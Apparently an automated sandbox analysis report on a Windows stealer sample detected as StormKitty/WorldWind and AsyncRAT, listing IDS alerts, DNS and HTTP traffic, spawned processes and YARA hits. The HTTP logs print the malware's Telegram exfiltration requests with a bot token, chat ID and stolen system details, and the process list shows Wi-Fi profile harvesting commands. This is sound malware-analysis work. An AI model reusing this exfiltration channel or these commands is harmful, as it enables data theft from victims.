                                                                                                                                                      RT_MANIFEST0x2e3ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                                                                      DLLImport
                                                                                                                                                      mscoree.dll_CorExeMain
                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                      2025-01-10T23:53:50.405005+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.949796149.154.167.220443TCP
                                                                                                                                                      2025-01-10T23:53:50.405005+01002031009ET MALWARE StormKitty Data Exfil via Telegram1192.168.2.949796149.154.167.220443TCP
                                                                                                                                                      2025-01-10T23:53:50.405005+01002044766ET MALWARE WorldWind Stealer Checkin via Telegram (GET)1192.168.2.949796149.154.167.220443TCP
                                                                                                                                                      2025-01-10T23:53:51.476326+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949806149.154.167.220443TCP
                                                                                                                                                      2025-01-10T23:53:51.476326+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.949806149.154.167.220443TCP
                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jan 10, 2025 23:53:48.195089102 CET4978880192.168.2.9104.16.184.241
                                                                                                                                                      Jan 10, 2025 23:53:48.199872971 CET8049788104.16.184.241192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:48.200026035 CET4978880192.168.2.9104.16.184.241
                                                                                                                                                      Jan 10, 2025 23:53:48.200845003 CET4978880192.168.2.9104.16.184.241
                                                                                                                                                      Jan 10, 2025 23:53:48.205625057 CET8049788104.16.184.241192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:48.670387030 CET8049788104.16.184.241192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:48.719059944 CET4978880192.168.2.9104.16.184.241
                                                                                                                                                      Jan 10, 2025 23:53:48.729649067 CET49794443192.168.2.9104.21.44.66
                                                                                                                                                      Jan 10, 2025 23:53:48.729681015 CET44349794104.21.44.66192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:48.729783058 CET49794443192.168.2.9104.21.44.66
                                                                                                                                                      Jan 10, 2025 23:53:48.738729000 CET49794443192.168.2.9104.21.44.66
                                                                                                                                                      Jan 10, 2025 23:53:48.738744020 CET44349794104.21.44.66192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:49.213663101 CET44349794104.21.44.66192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:49.214361906 CET49794443192.168.2.9104.21.44.66
                                                                                                                                                      Jan 10, 2025 23:53:49.217227936 CET49794443192.168.2.9104.21.44.66
                                                                                                                                                      Jan 10, 2025 23:53:49.217233896 CET44349794104.21.44.66192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:49.217531919 CET44349794104.21.44.66192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:49.266024113 CET49794443192.168.2.9104.21.44.66
                                                                                                                                                      Jan 10, 2025 23:53:49.267354965 CET49794443192.168.2.9104.21.44.66
                                                                                                                                                      Jan 10, 2025 23:53:49.311321974 CET44349794104.21.44.66192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:49.379203081 CET44349794104.21.44.66192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:49.379440069 CET44349794104.21.44.66192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:49.379590988 CET49794443192.168.2.9104.21.44.66
                                                                                                                                                      Jan 10, 2025 23:53:49.407016993 CET49794443192.168.2.9104.21.44.66
                                                                                                                                                      Jan 10, 2025 23:53:49.411209106 CET4978880192.168.2.9104.16.184.241
                                                                                                                                                      Jan 10, 2025 23:53:49.416201115 CET8049788104.16.184.241192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:49.417697906 CET4978880192.168.2.9104.16.184.241
                                                                                                                                                      Jan 10, 2025 23:53:49.423576117 CET49796443192.168.2.9149.154.167.220
                                                                                                                                                      Jan 10, 2025 23:53:49.423604012 CET44349796149.154.167.220192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:49.423676014 CET49796443192.168.2.9149.154.167.220
                                                                                                                                                      Jan 10, 2025 23:53:49.427696943 CET49796443192.168.2.9149.154.167.220
                                                                                                                                                      Jan 10, 2025 23:53:49.427711964 CET44349796149.154.167.220192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:50.046201944 CET44349796149.154.167.220192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:50.046298981 CET49796443192.168.2.9149.154.167.220
                                                                                                                                                      Jan 10, 2025 23:53:50.048528910 CET49796443192.168.2.9149.154.167.220
                                                                                                                                                      Jan 10, 2025 23:53:50.048542023 CET44349796149.154.167.220192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:50.048856974 CET44349796149.154.167.220192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:50.050400019 CET49796443192.168.2.9149.154.167.220
                                                                                                                                                      Jan 10, 2025 23:53:50.050437927 CET44349796149.154.167.220192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:50.405045033 CET44349796149.154.167.220192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:50.405128956 CET44349796149.154.167.220192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:50.405381918 CET49796443192.168.2.9149.154.167.220
                                                                                                                                                      Jan 10, 2025 23:53:50.410713911 CET49796443192.168.2.9149.154.167.220
                                                                                                                                                      Jan 10, 2025 23:53:50.422110081 CET49806443192.168.2.9149.154.167.220
                                                                                                                                                      Jan 10, 2025 23:53:50.422159910 CET44349806149.154.167.220192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:50.422257900 CET49806443192.168.2.9149.154.167.220
                                                                                                                                                      Jan 10, 2025 23:53:50.422555923 CET49806443192.168.2.9149.154.167.220
                                                                                                                                                      Jan 10, 2025 23:53:50.422580004 CET44349806149.154.167.220192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:51.050446987 CET44349806149.154.167.220192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:51.052253008 CET49806443192.168.2.9149.154.167.220
                                                                                                                                                      Jan 10, 2025 23:53:51.052293062 CET44349806149.154.167.220192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:51.476339102 CET44349806149.154.167.220192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:51.476418972 CET44349806149.154.167.220192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:51.476490021 CET49806443192.168.2.9149.154.167.220
                                                                                                                                                      Jan 10, 2025 23:53:51.477318048 CET49806443192.168.2.9149.154.167.220
                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jan 10, 2025 23:53:48.118321896 CET5084653192.168.2.91.1.1.1
                                                                                                                                                      Jan 10, 2025 23:53:48.126135111 CET53508461.1.1.1192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:48.183306932 CET4952053192.168.2.91.1.1.1
                                                                                                                                                      Jan 10, 2025 23:53:48.189991951 CET53495201.1.1.1192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:48.719443083 CET5685053192.168.2.91.1.1.1
                                                                                                                                                      Jan 10, 2025 23:53:48.728873968 CET53568501.1.1.1192.168.2.9
                                                                                                                                                      Jan 10, 2025 23:53:49.410516024 CET5548153192.168.2.91.1.1.1
                                                                                                                                                      Jan 10, 2025 23:53:49.417571068 CET53554811.1.1.1192.168.2.9
                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                      Jan 10, 2025 23:53:48.118321896 CET192.168.2.91.1.1.10xf83bStandard query (0)158.157.4.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                      Jan 10, 2025 23:53:48.183306932 CET192.168.2.91.1.1.10x6652Standard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                                                                                                      Jan 10, 2025 23:53:48.719443083 CET192.168.2.91.1.1.10xccd4Standard query (0)api.mylnikov.orgA (IP address)IN (0x0001)false
                                                                                                                                                      Jan 10, 2025 23:53:49.410516024 CET192.168.2.91.1.1.10xcacbStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                      Jan 10, 2025 23:53:48.126135111 CET1.1.1.1192.168.2.90xf83bName error (3)158.157.4.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                      Jan 10, 2025 23:53:48.189991951 CET1.1.1.1192.168.2.90x6652No error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                                                                                                                      Jan 10, 2025 23:53:48.189991951 CET1.1.1.1192.168.2.90x6652No error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                                                                                                                      Jan 10, 2025 23:53:48.728873968 CET1.1.1.1192.168.2.90xccd4No error (0)api.mylnikov.org104.21.44.66A (IP address)IN (0x0001)false
                                                                                                                                                      Jan 10, 2025 23:53:48.728873968 CET1.1.1.1192.168.2.90xccd4No error (0)api.mylnikov.org172.67.196.114A (IP address)IN (0x0001)false
                                                                                                                                                      Jan 10, 2025 23:53:49.417571068 CET1.1.1.1192.168.2.90xcacbNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                      • api.mylnikov.org
                                                                                                                                                      • api.telegram.org
                                                                                                                                                      • icanhazip.com
                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.949788104.16.184.241807540C:\Users\user\Desktop\cOH7jKmo25.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      Jan 10, 2025 23:53:48.200845003 CET63OUTGET / HTTP/1.1
                                                                                                                                                      Host: icanhazip.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Jan 10, 2025 23:53:48.670387030 CET535INHTTP/1.1 200 OK
                                                                                                                                                      Date: Fri, 10 Jan 2025 22:53:48 GMT
                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                      Content-Length: 13
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                      Access-Control-Allow-Methods: GET
                                                                                                                                                      Set-Cookie: __cf_bm=eA_K26SRSuLMMxaXIwIIpXA0d148ou8FVrPKuythsNU-1736549628-1.0.1.1-lsG66huH6BoVwWiGAHwFaE75dkD7zBGpH_GOzw7v0kwQqUBphs15jWlNMwEh7wMZyf.0QDdv661MKtZMVdop4Q; path=/; expires=Fri, 10-Jan-25 23:23:48 GMT; domain=.icanhazip.com; HttpOnly
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 90003ecad81a447a-EWR
                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a
                                                                                                                                                      Data Ascii: 8.46.123.189


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.949794104.21.44.664437540C:\Users\user\Desktop\cOH7jKmo25.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2025-01-10 22:53:49 UTC112OUTGET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1
                                                                                                                                                      Host: api.mylnikov.org
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2025-01-10 22:53:49 UTC1009INHTTP/1.1 200 OK
                                                                                                                                                      Date: Fri, 10 Jan 2025 22:53:49 GMT
                                                                                                                                                      Content-Type: application/json; charset=utf8
                                                                                                                                                      Content-Length: 88
                                                                                                                                                      Connection: close
                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                      Cache-Control: max-age=2678400
                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                      Age: 17087
                                                                                                                                                      Last-Modified: Fri, 10 Jan 2025 18:09:02 GMT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jtu3G2fMI3eyGZ3oj6yqu%2FeExl9bBE9R%2BuURN9DorhNrkdQnNYhRnHYAB%2Fw4j%2BefGv%2BwhCD3dXIefNyGBK4j9oiFDs%2BVYs7mIJ7r6XsC1PuCvtyG7jhFRHqWjV9duh3DtZXJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                      Strict-Transport-Security: max-age=0; preload
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Server: cloudflare
                                                                                                                                                      CF-RAY: 90003ecf3f628cc5-EWR
                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1813&rtt_var=689&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=726&delivery_rate=1578378&cwnd=228&unsent_bytes=0&cid=701755df879555b3&ts=177&x=0"
                                                                                                                                                      2025-01-10 22:53:49 UTC88INData Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 33 36 35 33 32 35 34 32 7d
                                                                                                                                                      Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1736532542}


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      1192.168.2.949796149.154.167.2204437540C:\Users\user\Desktop\cOH7jKmo25.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2025-01-10 22:53:50 UTC1720OUTGET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202025-01-10%205:53:38%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20302494%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20282H_%0ARAM:%204095MB%0AHWID:%20C344724773%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.189%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20da [TRUNCATED]
                                                                                                                                                      Host: api.telegram.org
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      2025-01-10 22:53:50 UTC344INHTTP/1.1 403 Forbidden
                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                      Date: Fri, 10 Jan 2025 22:53:50 GMT
                                                                                                                                                      Content-Type: application/json
                                                                                                                                                      Content-Length: 84
                                                                                                                                                      Connection: close
                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                      2025-01-10 22:53:50 UTC84INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 33 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 46 6f 72 62 69 64 64 65 6e 3a 20 62 6f 74 20 77 61 73 20 62 6c 6f 63 6b 65 64 20 62 79 20 74 68 65 20 75 73 65 72 22 7d
                                                                                                                                                      Data Ascii: {"ok":false,"error_code":403,"description":"Forbidden: bot was blocked by the user"}


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      2192.168.2.949806149.154.167.2204437540C:\Users\user\Desktop\cOH7jKmo25.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2025-01-10 22:53:51 UTC171OUTGET /bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage?chat_id=5287158069&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
                                                                                                                                                      Host: api.telegram.org
                                                                                                                                                      2025-01-10 22:53:51 UTC344INHTTP/1.1 403 Forbidden
                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                      Date: Fri, 10 Jan 2025 22:53:51 GMT
                                                                                                                                                      Content-Type: application/json
                                                                                                                                                      Content-Length: 84
                                                                                                                                                      Connection: close
                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                      2025-01-10 22:53:51 UTC84INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 33 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 46 6f 72 62 69 64 64 65 6e 3a 20 62 6f 74 20 77 61 73 20 62 6c 6f 63 6b 65 64 20 62 79 20 74 68 65 20 75 73 65 72 22 7d
                                                                                                                                                      Data Ascii: {"ok":false,"error_code":403,"description":"Forbidden: bot was blocked by the user"}


                                                                                                                                                      Click to jump to process

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Target ID:0
                                                                                                                                                      Start time:17:53:34
                                                                                                                                                      Start date:10/01/2025
                                                                                                                                                      Path:C:\Users\user\Desktop\cOH7jKmo25.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"C:\Users\user\Desktop\cOH7jKmo25.exe"
                                                                                                                                                      Imagebase:0x7e0000
                                                                                                                                                      File size:179'200 bytes
                                                                                                                                                      MD5 hash:F69889D705F5D72D65661B48535AE1B3
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                                                                                      • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.2566383997.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                      Reputation:low
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:2
                                                                                                                                                      Start time:17:53:46
                                                                                                                                                      Start date:10/01/2025
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                                                                                                      Imagebase:0xc50000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:3
                                                                                                                                                      Start time:17:53:46
                                                                                                                                                      Start date:10/01/2025
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:4
                                                                                                                                                      Start time:17:53:46
                                                                                                                                                      Start date:10/01/2025
                                                                                                                                                      Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:chcp 65001
                                                                                                                                                      Imagebase:0x190000
                                                                                                                                                      File size:12'800 bytes
                                                                                                                                                      MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:5
                                                                                                                                                      Start time:17:53:46
                                                                                                                                                      Start date:10/01/2025
                                                                                                                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:netsh wlan show profile
                                                                                                                                                      Imagebase:0x1200000
                                                                                                                                                      File size:82'432 bytes
                                                                                                                                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:6
                                                                                                                                                      Start time:17:53:46
                                                                                                                                                      Start date:10/01/2025
                                                                                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:findstr All
                                                                                                                                                      Imagebase:0x480000
                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:7
                                                                                                                                                      Start time:17:53:47
                                                                                                                                                      Start date:10/01/2025
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                                                                                                      Imagebase:0xc50000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:8
                                                                                                                                                      Start time:17:53:47
                                                                                                                                                      Start date:10/01/2025
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff70f010000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:9
                                                                                                                                                      Start time:17:53:47
                                                                                                                                                      Start date:10/01/2025
                                                                                                                                                      Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:chcp 65001
                                                                                                                                                      Imagebase:0x190000
                                                                                                                                                      File size:12'800 bytes
                                                                                                                                                      MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:10
                                                                                                                                                      Start time:17:53:47
                                                                                                                                                      Start date:10/01/2025
                                                                                                                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:netsh wlan show networks mode=bssid
                                                                                                                                                      Imagebase:0x1200000
                                                                                                                                                      File size:82'432 bytes
                                                                                                                                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Reset < >

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:15.4%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                        Signature Coverage:3.4%
                                                                                                                                                        Total number of Nodes:87
                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                        execution_graph 24363 5965320 24364 5965366 KiUserCallbackDispatcher 24363->24364 24366 59653b9 24364->24366 24367 5960b20 24368 5960b42 LdrInitializeThunk 24367->24368 24370 5960b7c 24368->24370 24267 2970888 24268 29708a3 24267->24268 24272 29775e6 24268->24272 24286 2977588 24268->24286 24271 2970902 24273 29775f1 24272->24273 24274 2977602 24273->24274 24300 2977f53 24273->24300 24305 2977e68 24273->24305 24310 2977e29 24273->24310 24315 2977f20 24273->24315 24320 2977ea2 24273->24320 24325 2977f03 24273->24325 24330 2977e85 24273->24330 24335 2977ee6 24273->24335 24340 2977e38 24273->24340 24345 2977ebf 24273->24345 24350 2977f70 24273->24350 24274->24271 24287 2977595 24286->24287 24288 2977602 24287->24288 24289 2977f53 2 API calls 24287->24289 24290 2977f70 2 API calls 24287->24290 24291 2977ebf 2 API calls 24287->24291 24292 2977e38 2 API calls 24287->24292 24293 2977ee6 2 API calls 24287->24293 24294 2977e85 2 API calls 24287->24294 24295 2977f03 2 API calls 24287->24295 24296 2977ea2 2 API calls 24287->24296 24297 2977f20 2 API calls 24287->24297 24298 2977e29 2 API calls 24287->24298 24299 2977e68 2 API calls 24287->24299 24288->24271 24289->24288 24290->24288 24291->24288 24292->24288 24293->24288 24294->24288 24295->24288 24296->24288 24297->24288 24298->24288 24299->24288 24301 2977f58 24300->24301 24302 2977f8b 24301->24302 24355 5960a6a 24301->24355 24359 5960a7c 24301->24359 24302->24274 24306 2977e6d 24305->24306 24307 2977f8b 24306->24307 24308 5960a7c KiUserExceptionDispatcher 24306->24308 24309 5960a6a KiUserExceptionDispatcher 24306->24309 24307->24274 24308->24307 24309->24307 24311 2977e35 24310->24311 24312 2977f8b 24311->24312 24313 5960a7c KiUserExceptionDispatcher 24311->24313 24314 5960a6a KiUserExceptionDispatcher 24311->24314 24312->24274 24313->24312 24314->24312 24316 2977f25 24315->24316 24317 2977f8b 24316->24317 24318 5960a7c KiUserExceptionDispatcher 24316->24318 24319 5960a6a KiUserExceptionDispatcher 24316->24319 24317->24274 24318->24317 24319->24317 24321 2977ea7 24320->24321 24322 2977f8b 24321->24322 24323 5960a7c KiUserExceptionDispatcher 24321->24323 24324 5960a6a KiUserExceptionDispatcher 24321->24324 24322->24274 24323->24322 24324->24322 24326 2977f08 24325->24326 24327 2977f8b 24326->24327 24328 5960a7c KiUserExceptionDispatcher 24326->24328 24329 5960a6a KiUserExceptionDispatcher 24326->24329 